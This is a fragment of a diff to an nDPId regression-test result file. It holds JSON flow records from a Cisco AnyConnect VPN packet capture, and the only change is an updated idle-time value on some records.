00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} @@ -335,8 +335,8 @@ 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2441,"flow_first_seen":1569687268746,"flow_last_seen":1569687289262,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1469,"flow_tot_l4_payload_len":789975,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1569687241656,"flow_last_seen":1569687287122,"flow_idle_time":120000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1920,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} @@ -347,45 +347,45 @@ 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687241422,"flow_last_seen":1569687286460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":2200,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687241422,"flow_last_seen":1569687286460,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":2200,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1569687267797,"flow_last_seen":1569687267821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -01168{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1569687260591,"flow_last_seen":1569687262892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":9167,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1569687267797,"flow_last_seen":1569687267821,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +01168{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1569687260591,"flow_last_seen":1569687262892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":9167,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247596,"flow_last_seen":1569687248620,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260772,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00912{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687245379,"flow_last_seen":1569687245725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8058,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1569687245688,"flow_last_seen":1569687268830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22452,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -01035{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1569687267035,"flow_last_seen":1569687288923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21688,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 